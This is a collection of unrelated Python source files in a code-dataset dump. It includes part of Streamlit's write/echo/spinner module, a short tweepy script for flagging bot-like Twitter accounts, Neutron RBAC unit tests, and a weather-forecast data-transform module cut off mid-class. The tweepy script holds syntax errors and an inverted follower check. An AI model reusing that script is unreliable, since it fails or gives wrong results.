plotly_chart(arg)\n elif _type_util.is_type(arg, \"bokeh.plotting.figure.Figure\"):\n flush_buffer()\n bokeh_chart(arg)\n elif _type_util.is_graphviz_chart(arg):\n flush_buffer()\n graphviz_chart(arg)\n elif _type_util.is_sympy_expession(arg):\n flush_buffer()\n latex(arg)\n elif _type_util.is_keras_model(arg):\n from tensorflow.python.keras.utils import vis_utils\n\n flush_buffer()\n dot = vis_utils.model_to_dot(arg)\n graphviz_chart(dot.to_string())\n elif isinstance(arg, (dict, list)):\n flush_buffer()\n json(arg)\n elif _type_util.is_namedtuple(arg):\n flush_buffer()\n json(_json.dumps(arg._asdict()))\n elif _type_util.is_pydeck(arg):\n flush_buffer()\n pydeck_chart(arg)\n else:\n string_buffer.append(\"`%s`\" % str(arg).replace(\"`\", \"\\\\`\"))\n\n flush_buffer()\n\n except Exception:\n _, exc, exc_tb = _sys.exc_info()\n exception(exc, exc_tb) # noqa: F821\n\n\ndef experimental_show(*args):\n \"\"\"Write arguments and *argument names* to your app for debugging purposes.\n\n Show() has similar properties to write():\n\n 1. You can pass in multiple arguments, all of which will be debugged.\n 2. It returns None, so it's \"slot\" in the app cannot be reused.\n\n Note: This is an experimental feature. See\n https://docs.streamlit.io/en/latest/pre_release_features.html for more information.\n\n Parameters\n ----------\n *args : any\n One or many objects to debug in the App.\n\n Example\n -------\n\n >>> dataframe = pd.DataFrame({\n ... 'first column': [1, 2, 3, 4],\n ... 'second column': [10, 20, 30, 40],\n ... 
}))\n >>> st.experimental_show(dataframe)\n\n Notes\n -----\n\n This is an experimental feature with usage limitations:\n\n - The method must be called with the name `show`.\n - Must be called in one line of code, and only once per line.\n - When passing multiple arguments the inclusion of `,` or `)` in a string\n argument may cause an error.\n\n \"\"\"\n if not args:\n return\n\n try:\n import inspect\n\n # Get the calling line of code\n current_frame = inspect.currentframe()\n if current_frame is None:\n warning(\"`show` not enabled in the shell\")\n return\n lines = inspect.getframeinfo(current_frame.f_back)[3]\n\n if not lines:\n warning(\"`show` not enabled in the shell\")\n return\n\n # Parse arguments from the line\n line = lines[0].split(\"show\", 1)[1]\n inputs = _code_util.get_method_args_from_code(args, line)\n\n # Escape markdown and add deltas\n for idx, input in enumerate(inputs):\n escaped = _string_util.escape_markdown(input)\n\n markdown(\"**%s**\" % escaped)\n write(args[idx])\n\n except Exception:\n _, exc, exc_tb = _sys.exc_info()\n exception(exc, exc_tb) # noqa: F821\n\n\n@_contextlib.contextmanager\ndef spinner(text=\"In progress...\"):\n \"\"\"Temporarily displays a message while executing a block of code.\n\n Parameters\n ----------\n text : str\n A message to display while executing that block\n\n Example\n -------\n\n >>> with st.spinner('Wait for it...'):\n >>> time.sleep(5)\n >>> st.success('Done!')\n\n \"\"\"\n import streamlit.caching as caching\n\n # @st.cache optionally uses spinner for long-running computations.\n # Normally, streamlit warns the user when they call st functions\n # from within an @st.cache'd function. But we do *not* want to show\n # these warnings for spinner's message, so we create and mutate this\n # message delta within the \"suppress_cached_st_function_warning\"\n # context.\n with caching.suppress_cached_st_function_warning():\n message = empty()\n\n try:\n # Set the message 0.1 seconds in the future to avoid annoying\n # flickering if this spinner runs too quickly.\n DELAY_SECS = 0.1\n display_message = True\n display_message_lock = _threading.Lock()\n\n def set_message():\n with display_message_lock:\n if display_message:\n with caching.suppress_cached_st_function_warning():\n message.warning(str(text))\n\n _add_report_ctx(_threading.Timer(DELAY_SECS, set_message)).start()\n\n # Yield control back to the context.\n yield\n finally:\n if display_message_lock:\n with display_message_lock:\n display_message = False\n with caching.suppress_cached_st_function_warning():\n message.empty()\n\n\n_SPACES_RE = _re.compile(\"\\\\s*\")\n\n\n@_contextlib.contextmanager\ndef echo(code_location=\"above\"):\n \"\"\"Use in a `with` block to draw some code on the app, then execute it.\n\n Parameters\n ----------\n code_location : \"above\" or \"below\"\n Whether to show the echoed code before or after the results of the\n executed code block.\n\n Example\n -------\n\n >>> with st.echo():\n >>> st.write('This code will be printed')\n\n \"\"\"\n if code_location == \"below\":\n show_code = code\n show_warning = warning\n else:\n placeholder = empty() # noqa: F821\n show_code = placeholder.code\n show_warning = placeholder.warning\n\n try:\n frame = _traceback.extract_stack()[-3]\n filename, start_line = frame.filename, frame.lineno\n yield\n frame = _traceback.extract_stack()[-3]\n end_line = frame.lineno\n lines_to_display = [] # type: List[str]\n with _source_util.open_python_file(filename) as source_file:\n source_lines = source_file.readlines()\n 
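# start_line is the 1-based line number of the `with st.echo():` statement and\n # end_line that of the last statement executed inside the block, so this\n # 0-based slice skips the `with` line and keeps only the block body run so far.\n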
lines_to_display.extend(source_lines[start_line:end_line])\n match = _SPACES_RE.match(lines_to_display[0])\n initial_spaces = match.end() if match else 0\n for line in source_lines[end_line:]:\n match = _SPACES_RE.match(line)\n indentation = match.end() if match else 0\n # The != 1 is because we want to allow '\\n' between sections.\n if indentation != 1 and indentation < initial_spaces:\n break\n lines_to_display.append(line)\n line_to_display = _textwrap.dedent(\"\".join(lines_to_display))\n\n show_code(line_to_display, \"python\")\n\n except FileNotFoundError as err:\n show_warning(\"Unable to display code. %s\" % err)\n\n\ndef _transparent_write(*args):\n \"\"\"This is just st.write, but returns the arguments you passed to it.\"\"\"\n write(*args)\n if len(args) == 1:\n return args[0]\n return args\n\n\n# We want to show a warning when the user runs a Streamlit script without\n# 'streamlit run', but we need to make sure the warning appears only once no\n# matter how many times __init__ gets loaded.\n_repl_warning_has_been_displayed = False\n\n\ndef _maybe_print_repl_warning():\n global _repl_warning_has_been_displayed\n\n if not _repl_warning_has_been_displayed:\n _repl_warning_has_been_displayed = True\n\n if _env_util.is_repl():\n _LOGGER.warning(\n _textwrap.dedent(\n \"\"\"\n\n Will not generate Streamlit app\n\n To generate an app, use Streamlit in a file and run it with:\n $ streamlit run [FILE_NAME] [ARGUMENTS]\n\n \"\"\"\n )\n )\n\n elif _config.get_option(\"global.showWarningOnDirectExecution\"):\n script_name = _sys.argv[0]\n\n _LOGGER.warning(\n _textwrap.dedent(\n \"\"\"\n\n Will not generate Streamlit App\n\n To generate an App, run this file with:\n $ streamlit run %s [ARGUMENTS]\n\n \"\"\"\n ),\n script_name,\n )\n"} {"ext": "py", "sha": "1a306dccb8b41da09959fcc13ab1361f129ee05b", "content": "import tweepy\nimport csv\nimport time\nimport timeit\nimport datetime\nimport re\n\n\ndef tweetrate (listoftweets):\n #Takes a list of tweets of type tweepy.cursor(api.user_timeline,...), returns [rate of tweets in tweets per day (including fractional), total number of tweets in dataset, and the time period of the sample as a timedelta]\n tweet = []\n for tweet1 in listoftweets:\n tweet.append(tweet1.created_at)\n length = len(tweet)\n datebegin = tweet[0]\n dateend = tweet[length-1]\n return [(length-1)/((datebegin-dateend).days + (datebegin-dateend).seconds/86400), length, datebegin-dateend]\n\ndef maybe_enum (list, keep=\"off\"):\n #Checks to see which of a list of user names end in a sequence of numbers, possibly indicating that a username was automatically generated in sequence.\n #\n #An example of this might be a number of accounts that look like \"chair02003\", \"book20031\", \"world60063\" - a clear pattern of words followed by 5 digit sequences.\n #Of course, there are a bunch of reasons people put numbers in their names organicaly-- \"Trump2020\". \"SexySince1979\". 
\"n1ckn4m3\", etc.\n #\n #By default, maybe_enum returns a 2d list where list[x] = [user name, digit at end of username], ignoring all usernames that don't end in digits.\n #If the variable 'keep' is set to \"on\" - i.e., calling it as maybe_enum(list,\"on\") - it won't ignore the usernames that don't end in digits, but instead handle those like this: [\"nodigit\", -1]\n outlist = []\n for user in list:\n enum = re.search(r'\\d+$', user)\n if enum is not None:\n outlist.append([user, enum.group()])\n else:\n if keep == \"on\":\n outlist.append([user, -1])\n return outlist\n\ndef enum_sort (enums):\n #maybe you'd rather see your \"maybe_enum\" list in terms of how many names ended in sequences of digits of length (n). This will do that! Every outlist [n] = [total number of usernames ending in a sequence of length n, list of names fitting that criteria] \n outlist = [[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]]]\n for userstat in enums:\n outlist[len(userstat[1])][1].append(userstat[0])\n outlist[len(userstat[1])][0] = outlist[len(userstat[1])][0] + 1\n return outlist\n\n\ndef hasfollowers (user, thresh = 1):\n #takes a user of type api.get_user(user) and checks if it has at least 'thresh' number of followers. If no thresh is given, defaults to 1\n if user.friends_count > thresh:\n return (0)\n else:\n return (1) \n \ndef hastweeted (listoftweets, thresh=1):\n #Takes a list of tweets of type tweepy.Cursor(api.user_timeline...) and tells you if the account has tweeted at least thresh times (thresh defaults to 1\n tweet = []\n for tweet1 in listoftweets:\n tweet.append (tweet1)\n if len(tweet) > thresh:\n return (1)\n else:\n return (0)\n\n def rate_limiter(api):\n #This function checks if you've hit any twitter API limits. If you have, this module will pause your program until the limits reset,\n #checking every 60 seconds to see if they have. \n # DUMMY CODE FOR TWEEPY ERROR HANDLING\n #try:\n # [Tweepy API Call]\n #except tweepy.error.RateLimitError:\n # rate_limit_check()\n rate_limit = api.rate_limit_status()[\"resources\"]\n while true: \n for rate in rate_limit:\n endpoints = rate_limit[rate]\n for endpoint in endpoints:\n limit = rate_limit[rate][endpoint][\"limit\"]\n remaining = rate_limit[rate][endpoint][\"remaining\"]\n if remaining == 0:\n time.sleep(60)\n else return\n\n"} {"ext": "py", "sha": "1a306e594e2f2150ce955d3b38129b1e11f93425", "content": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom unittest import mock\n\nfrom neutron_lib.callbacks import events\nfrom neutron_lib import context as n_context\nfrom neutron_lib.db import model_base\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.objects import common_types\nfrom oslo_versionedobjects import fields as obj_fields\nimport sqlalchemy as sa\n\nfrom neutron.db import rbac_db_models\nfrom neutron.extensions import rbac as ext_rbac\nfrom neutron.objects import base\nfrom neutron.objects.db import api as obj_db_api\nfrom neutron.objects import rbac_db\nfrom neutron.tests.unit.objects import test_rbac\nfrom neutron.tests.unit import testlib_api\n\n\nclass FakeDbModel(dict):\n pass\n\n\nclass FakeRbacModel(rbac_db_models.RBACColumns, model_base.BASEV2):\n object_id = sa.Column(sa.String(36), nullable=False)\n object_type = 'fake_rbac_object'\n\n def get_valid_actions(self):\n return (rbac_db_models.ACCESS_SHARED,)\n\n\n@base.NeutronObjectRegistry.register_if(False)\nclass FakeNeutronRbacObject(base.NeutronDbObject):\n VERSION = '1.0'\n\n db_model = FakeRbacModel\n\n fields = {\n 'object_id': obj_fields.StringField(),\n 'target_tenant': obj_fields.StringField(),\n 'action': obj_fields.StringField(),\n }\n\n\n@base.NeutronObjectRegistry.register_if(False)\nclass FakeNeutronDbObject(rbac_db.NeutronRbacObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n rbac_db_cls = FakeNeutronRbacObject\n db_model = FakeDbModel\n\n fields = {\n 'id': common_types.UUIDField(),\n 'field1': obj_fields.StringField(),\n 'field2': obj_fields.StringField(),\n 'shared': obj_fields.BooleanField(default=False),\n }\n\n fields_no_update = ['id']\n\n synthetic_fields = ['field2']\n\n def get_bound_project_ids(cls, context, policy_id):\n pass\n\n\nclass RbacNeutronDbObjectTestCase(test_rbac.RBACBaseObjectIfaceTestCase,\n testlib_api.SqlTestCase):\n _test_class = FakeNeutronDbObject\n\n def setUp(self):\n super(RbacNeutronDbObjectTestCase, self).setUp()\n FakeNeutronDbObject.update_post = mock.Mock()\n\n @mock.patch.object(_test_class.rbac_db_cls, 'db_model')\n def test_get_projects_with_shared_access_to_db_obj_return_project_ids(\n self, *mocks):\n ctx = mock.Mock()\n fake_ids = {'project_id_' + str(i) for i in range(10)}\n ctx.session.query.return_value.filter.return_value = [\n (fake_id,) for fake_id in fake_ids]\n ret_ids = self._test_class._get_projects_with_shared_access_to_db_obj(\n ctx, 'fake_db_obj_id')\n self.assertEqual(fake_ids, ret_ids)\n\n def test_is_accessible_for_admin(self):\n ctx = mock.Mock(is_admin=True, project_id='we_dont_care')\n self.assertTrue(self._test_class.is_accessible(ctx, None))\n\n def test_is_accessible_for_db_object_owner(self):\n ctx = mock.Mock(is_admin=False, project_id='db_object_owner')\n db_obj = mock.Mock(project_id=ctx.project_id)\n\n self.assertTrue(self._test_class.is_accessible(ctx, db_obj))\n\n @mock.patch.object(_test_class, 'is_shared_with_project',\n return_value=True)\n def test_is_accessible_if_shared_with_project(self, mock_is_shared):\n ctx = mock.Mock(is_admin=False, project_id='db_object_shareholder')\n db_obj = mock.Mock(project_id='db_object_owner')\n\n self.assertTrue(self._test_class.is_accessible(ctx, db_obj))\n mock_is_shared.assert_called_once_with(\n mock.ANY, db_obj.id, ctx.project_id)\n\n @mock.patch.object(_test_class, 'is_shared_with_project',\n return_value=False)\n def test_is_accessible_fails_for_unauthorized_project(self,\n mock_is_shared):\n ctx = 
mock.Mock(is_admin=False, project_id='Billy_the_kid')\n db_obj = mock.Mock(project_id='db_object_owner')\n\n self.assertFalse(self._test_class.is_accessible(ctx, db_obj))\n mock_is_shared.assert_called_once_with(\n mock.ANY, db_obj.id, ctx.project_id)\n\n def _rbac_policy_generate_change_events(self, resource, trigger,\n context, object_type, policy,\n event_list):\n for event in event_list:\n payload = events.DBEventPayload(\n context, states=(policy,),\n metadata={'object_type': object_type})\n if event == events.BEFORE_CREATE:\n payload.states = []\n payload.request_body = policy\n self._test_class.validate_rbac_policy_change(\n resource, event, trigger, payload=payload)\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n def test_validate_rbac_policy_change_handles_only_object_type(\n self, mock_validate_rbac_update):\n self._rbac_policy_generate_change_events(\n resource=None, trigger='dummy_trigger', context=None,\n object_type='dummy_object_type', policy=None,\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE,\n events.BEFORE_DELETE))\n\n mock_validate_rbac_update.assert_not_called()\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value={'project_id': 'tyrion_lannister'})\n def test_validate_rbac_policy_change_allowed_for_admin_or_owner(\n self, mock_get_object, mock_validate_update):\n context = mock.Mock(is_admin=True, project_id='db_obj_owner_id')\n self._rbac_policy_generate_change_events(\n resource=None, trigger='dummy_trigger', context=context,\n object_type=self._test_class.rbac_db_cls.db_model.object_type,\n policy={'object_id': 'fake_object_id'},\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))\n\n self.assertTrue(self._test_class.validate_rbac_policy_update.called)\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value={'project_id': 'king_beyond_the_wall'})\n def test_validate_rbac_policy_change_forbidden_for_outsiders(\n self, mock_get_object, mock_validate_update):\n context = mock.Mock(is_admin=False, project_id='db_obj_owner_id')\n self.assertRaises(\n n_exc.InvalidInput,\n self._rbac_policy_generate_change_events,\n resource=mock.Mock(), trigger='dummy_trigger', context=context,\n object_type=self._test_class.rbac_db_cls.db_model.object_type,\n policy={'object_id': 'fake_object_id'},\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))\n self.assertFalse(mock_validate_update.called)\n\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def _test_validate_rbac_policy_delete_handles_policy(\n self, policy, mock_validate_delete):\n payload = events.DBEventPayload(\n n_context.get_admin_context(),\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n self._test_class.validate_rbac_policy_delete(\n resource=mock.Mock(), event=events.BEFORE_DELETE,\n trigger='dummy_trigger', payload=payload)\n mock_validate_delete.assert_not_called()\n\n def test_validate_rbac_policy_delete_handles_shared_action(self):\n self._test_validate_rbac_policy_delete_handles_policy(\n {'action': 'unknown_action'})\n\n @mock.patch.object(obj_db_api, 'get_object')\n def test_validate_rbac_policy_delete_skips_db_object_owner(self,\n mock_get_object):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': 'fake_project_id',\n 'object_id': 'fake_obj_id',\n 'project_id': 'fake_project_id'}\n mock_get_object.return_value.project_id = 
policy['target_tenant']\n self._test_validate_rbac_policy_delete_handles_policy(policy)\n\n @mock.patch.object(obj_db_api, 'get_object')\n @mock.patch.object(_test_class, 'get_bound_project_ids',\n return_value='project_id_shared_with')\n def test_validate_rbac_policy_delete_fails_single_project_and_in_use(\n self, get_bound_project_ids_mock, mock_get_object):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': 'project_id_shared_with',\n 'project_id': 'object_owner_project_id',\n 'object_id': 'fake_obj_id'}\n context = mock.Mock()\n with mock.patch.object(\n self._test_class,\n '_get_db_obj_rbac_entries') as target_tenants_mock:\n filter_mock = target_tenants_mock.return_value.filter\n filter_mock.return_value.count.return_value = 0\n payload = events.DBEventPayload(\n context,\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n self.assertRaises(\n ext_rbac.RbacPolicyInUse,\n self._test_class.validate_rbac_policy_delete,\n resource=None,\n event=events.BEFORE_DELETE,\n trigger='dummy_trigger',\n payload=payload)\n\n def test_validate_rbac_policy_delete_not_bound_project_success(self):\n context = mock.Mock()\n with mock.patch.object(\n self._test_class, 'get_bound_project_ids',\n return_value={'fake_tid2', 'fake_tid3'}), \\\n mock.patch.object(self._test_class,\n '_get_db_obj_rbac_entries') as get_rbac_entries_mock, \\\n mock.patch.object(\n self._test_class,\n '_get_projects_with_shared_access_to_db_obj') as sh_tids:\n get_rbac_entries_mock.filter.return_value.count.return_value = 0\n self._test_class._validate_rbac_policy_delete(\n context=context,\n obj_id='fake_obj_id',\n target_tenant='fake_tid1')\n sh_tids.assert_not_called()\n\n @mock.patch.object(_test_class, '_get_db_obj_rbac_entries')\n @mock.patch.object(_test_class,\n '_get_projects_with_shared_access_to_db_obj',\n return_value=['some_other_project'])\n @mock.patch.object(_test_class, 'get_bound_project_ids',\n return_value={'fake_id1'})\n def test_validate_rbac_policy_delete_fails_single_used_wildcarded(\n self, get_bound_project_ids_mock, mock_projects_with_shared_access,\n _get_db_obj_rbac_entries_mock):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': '*',\n 'project_id': 'object_owner_project_id',\n 'object_id': 'fake_obj_id'}\n context = mock.Mock()\n payload = events.DBEventPayload(\n context,\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n with mock.patch.object(obj_db_api, 'get_object'):\n self.assertRaises(\n ext_rbac.RbacPolicyInUse,\n self._test_class.validate_rbac_policy_delete,\n resource=mock.Mock(),\n event=events.BEFORE_DELETE,\n trigger='dummy_trigger',\n payload=payload)\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value=['fake_rbac_policy'])\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_avoid_duplicate_update(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n obj = self._test_class(mock.Mock())\n obj.update_shared(is_shared_new=True, obj_id=obj_id)\n get_object_mock.assert_called_with(\n obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n self.assertFalse(mock_validate_delete.called)\n self.assertFalse(attach_rbac_mock.called)\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object', return_value=[])\n 
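# get_object returning [] simulates the absence of an existing wildcard RBAC\n # entry, so update_shared() is expected to create one via attach_rbac().\n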
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_wildcard(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n\n test_neutron_obj = self._test_class(mock.Mock())\n test_neutron_obj.update_shared(is_shared_new=True, obj_id=obj_id)\n get_object_mock.assert_called_with(\n test_neutron_obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n\n attach_rbac_mock.assert_called_with(\n obj_id, test_neutron_obj.obj_context.project_id)\n\n def test_shared_field_false_without_context(self):\n test_neutron_obj = self._test_class()\n self.assertFalse(test_neutron_obj.to_dict()['shared'])\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value=['fake_rbac_policy'])\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_remove_wildcard_sharing(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n obj = self._test_class(mock.Mock())\n obj.update_shared(is_shared_new=False, obj_id=obj_id)\n get_object_mock.assert_called_with(\n obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n\n self.assertFalse(attach_rbac_mock.attach_rbac.called)\n mock_validate_delete.assert_called_with(mock.ANY, obj_id, '*')\n\n @mock.patch.object(_test_class, 'create_rbac_policy')\n def test_attach_rbac_returns_type(self, create_rbac_mock):\n obj_id = 'fake_obj_id'\n project_id = 'fake_project_id'\n target_tenant = 'fake_target_project'\n self._test_class(mock.Mock()).attach_rbac(obj_id, project_id,\n target_tenant)\n rbac_pol = create_rbac_mock.call_args_list[0][0][1]['rbac_policy']\n self.assertEqual(rbac_pol['object_id'], obj_id)\n self.assertEqual(rbac_pol['target_tenant'], target_tenant)\n self.assertEqual(rbac_pol['action'], rbac_db_models.ACCESS_SHARED)\n self.assertEqual(rbac_pol['object_type'],\n self._test_class.rbac_db_cls.db_model.object_type)\n"} {"ext": "py", "sha": "1a306f6dbf62485a1faeac3dfb2b6ee640b6a2b7", "content": "\"\"\"Various constants and distributions that decribe our dataset. 
Intended use\nis normalization of the fields before sending them to a neural net.\n\nSee notebook distributions-of-parameters.ipynb\"\"\"\n\nimport logging\nimport numpy as np\nimport torch\nimport random\nimport xarray as xr\n\nfrom .util import add_biweekly_dim, obs_to_biweekly, std_estimator, fix_s2s_dataset_dims\n\n_logger = logging.getLogger(__name__)\n\n\nFIELD_MEAN = {\n \"gh10\": 30583.0,\n \"gh100\": 16070.0,\n \"gh1000\": 76.19,\n \"gh200\": 11765.0,\n \"gh500\": 5524.374,\n \"gh850\": 1403.0,\n \"lsm\": 0.0,\n \"msl\": 100969.28,\n \"orog\": 387.1,\n \"siconc\": 0.17,\n \"sst\": 286.96,\n \"st100\": 268.75,\n \"st20\": 268.69,\n \"sm20\": 250.68,\n \"t2m\": 278.2237,\n \"tp\": 34.1,\n \"u1000\": -0.17,\n \"u850\": 1.26,\n \"u500\": 6.43,\n \"u200\": 14.43,\n \"u100\": 5.30,\n \"v1000\": 0.18,\n \"v850\": 0.11,\n \"v500\": -0.03,\n \"v200\": -0.01,\n \"v100\": 0.10,\n}\n\nFIELD_STD = {\n \"gh10\": 993.0,\n \"gh100\": 577.0,\n \"gh1000\": 110.14,\n \"gh200\": 605.0,\n \"gh500\": 341.80862,\n \"gh850\": 149.6,\n \"lsm\": 1.0,\n \"msl\": 1343.6,\n \"orog\": 856.0,\n \"siconc\": 0.35,\n \"sst\": 11.73,\n \"st100\": 26.74,\n \"st20\": 26.91,\n \"sm20\": 125.99,\n \"tp\": 43.7,\n \"t2m\": 21.2692,\n \"u1000\": 6.09,\n \"u850\": 8.07,\n \"u500\": 11.73,\n \"u200\": 17.76,\n \"u100\": 12.02,\n \"v1000\": 5.22,\n \"v850\": 6.144,\n \"v500\": 9.03,\n \"v200\": 12.18,\n \"v100\": 6.57,\n}\n\n\ndef normalize_dataset(dataset):\n for v in dataset.data_vars:\n dataset[v] = (dataset[v] - FIELD_MEAN[v]) / FIELD_STD[v]\n\n return dataset\n\n\ndef denormalize_dataset(dataset):\n for v in dataset.data_vars:\n dataset[v] = (dataset[v] * FIELD_STD[v]) + FIELD_MEAN[v]\n\n return dataset\n\n\ndef apply_to_all(transform, example):\n \"\"\"Utility function to apply a transform on all the kews of an example.\"\"\"\n new_example = {}\n for k in example:\n new_example[k] = transform(example[k])\n\n return new_example\n\n\nclass AddBiweeklyDimTransform:\n \"\"\"Transform that takes a training example and adds the biweekly dimension to it.\"\"\"\n\n def __init__(self, weeks_12=False, features=False):\n self.weeks_12 = weeks_12\n self.features = features\n\n def __call__(self, example):\n\n to_transform = [\"model\", \"obs\"]\n if self.features:\n to_transform.append(\"features\")\n\n new_example = {}\n for k in example:\n if k in to_transform:\n new_example[k] = add_biweekly_dim(example[k], weeks_12=self.weeks_12)\n else:\n new_example[k] = example[k]\n\n return new_example\n\n\nclass AddMetadata:\n \"\"\"Add various metadata to the example dict.\"\"\"\n\n def __call__(self, example):\n model = example[\"terciles\"]\n year = int(model.forecast_time.dt.year)\n month = int(model.forecast_time.dt.month)\n day = int(model.forecast_time.dt.day)\n example[\"monthday\"] = f\"{month:02}{day:02}\"\n example[\"month\"] = f\"{month:02}\"\n example[\"year\"] = f\"{year:04}\"\n\n example[\"latitude\"] = model.latitude\n example[\"longitude\"] = model.longitude\n\n return example\n\n\nclass AddDryMask:\n def __init__(self, threshold=0.01):\n self.threshold = threshold\n\n def __call__(self, example):\n edges = example[\"edges\"]\n wet_mask = (edges.isel(category_edge=0) > self.threshold).drop(\"t2m\")\n example[\"dry_mask\"] = ~wet_mask\n return example\n\n\nclass ExampleToPytorch:\n def __call__(self, example):\n pytorch_example = {}\n\n for dataset_name in [\n \"obs\",\n \"model\",\n \"features\",\n \"terciles\",\n \"edges\",\n \"model_parameters\",\n \"dry_mask\",\n \"eccc_parameters\",\n \"ncep_parameters\",\n ]:\n if 
dataset_name in example:\n dataset = example[dataset_name]\n for variable in dataset.data_vars:\n new_key = f\"{dataset_name}_{variable}\"\n pytorch_example[new_key] = torch.from_numpy(dataset[variable].data)\n\n for k in [\"year\", \"monthday\", \"month\", \"eccc_available\", \"ncep_available\"]:\n pytorch_example[k] = example[k]\n\n for k in [\"latitude\", \"longitude\"]:\n pytorch_example[k] = torch.from_numpy(example[k].data)\n\n return pytorch_example\n\n\nclass CompositeTransform:\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, example):\n transformed_example = example\n for t in self.transforms:\n transformed_example = t(transformed_example)\n\n return transformed_example\n\n def __repr__(self):\n inner_str = \", \".join([repr(t) for t in self.transforms])\n\n return f\"CompositeTransform([{inner_str}])\"\n\n\ndef t2m_to_normal(model):\n model_t2m_mean = model.t2m.mean(dim=[\"lead_time\", \"realization\"]).rename(\"t2m_mu\")\n model_t2m_std = std_estimator(model.t2m, dim=[\"lead_time\", \"realization\"]).rename(\n \"t2m_sigma\"\n )\n\n return xr.merge([model_t2m_mean, model_t2m_std]).rename(\n biweekly_forecast=\"lead_time\"\n )\n\n\ndef tp_to_normal(model):\n model_tp_mean = model.tp.isel(lead_time=-1).mean(dim=\"realization\").rename(\"tp_mu\")\n model_tp_std = std_estimator(model.tp.isel(lead_time=-1), dim=\"realization\").rename(\n \"tp_sigma\"\n )\n\n return (\n xr.merge([model_tp_mean, model_tp_std])\n .drop(\"lead_time\")\n .rename(biweekly_forecast=\"lead_time\")\n )\n\n\ndef model_to_distribution(model):\n model_t2m = t2m_to_normal(model)\n model_tp = tp_to_normal(model)\n\n return xr.merge([model_t2m, model_tp])\n\n\nclass LinearModelAdapter:\n def __init__(self, make_distributions=True):\n self.make_distributions = make_distributions\n\n def __call__(self, example):\n if self.make_distributions:\n example[\"model\"] = model_to_distribution(example[\"model\"])\n\n example[\"obs\"] = obs_to_biweekly(example[\"obs\"])\n\n return example\n\n\nclass CubeRootTP:\n \"\"\"Apply a cubic root on precipitation data.\"\"\"\n\n def __init__(self):\n pass\n\n def __call__(self, example):\n for k in [\"obs_tp\", \"edges_tp\"]:\n if k in example:\n example[k] = example[k] ** (1.0 / 3.0)\n\n return example\n\n\nclass AddLatLonFeature:\n def __init__(self):\n pass\n\n def __call__(self, example):\n obs = example[\"terciles\"]\n lat_array = obs[\"latitude\"].assign_coords(variable=\"lat\")\n lat_array = (lat_array / lat_array.max()).astype(\"float32\")\n\n lon_array = obs[\"longitude\"].assign_coords(variable=\"lon\")\n lon_array = np.sin(np.deg2rad(lon_array)).astype(\"float32\")\n\n features_array = example[\"features\"].features\n\n catted_features = xr.concat(\n [features_array, lat_array, lon_array], dim=\"variable\"\n )\n\n example[\"features\"] = catted_features.to_dataset()\n\n return example\n\n\nclass AddGeographyFeatures:\n def __init__(self, geography_file):\n geo_dataset = fix_s2s_dataset_dims(xr.open_dataset(geography_file))\n subset = geo_dataset[[\"orog\"]]\n geo = normalize_dataset(subset)\n self.geo_features = geo.to_array().to_dataset(name=\"features\")\n\n def __call__(self, batch):\n features = batch[\"features\"]\n\n geo_at_lead = self.geo_features.sel(lead_time=features.lead_time)\n new_features_dataset = xr.concat([features, geo_at_lead], dim=\"variable\")\n\n batch[\"features\"] = new_features_dataset\n\n return batch\n\n\nclass RandomNoise:\n def __init__(self, keys=[\"features_features\"], sigma=0.01):\n self.keys = keys\n 
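# sigma is the standard deviation of the zero-mean Gaussian noise that\n # __call__ adds to each tensor listed in keys.\n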
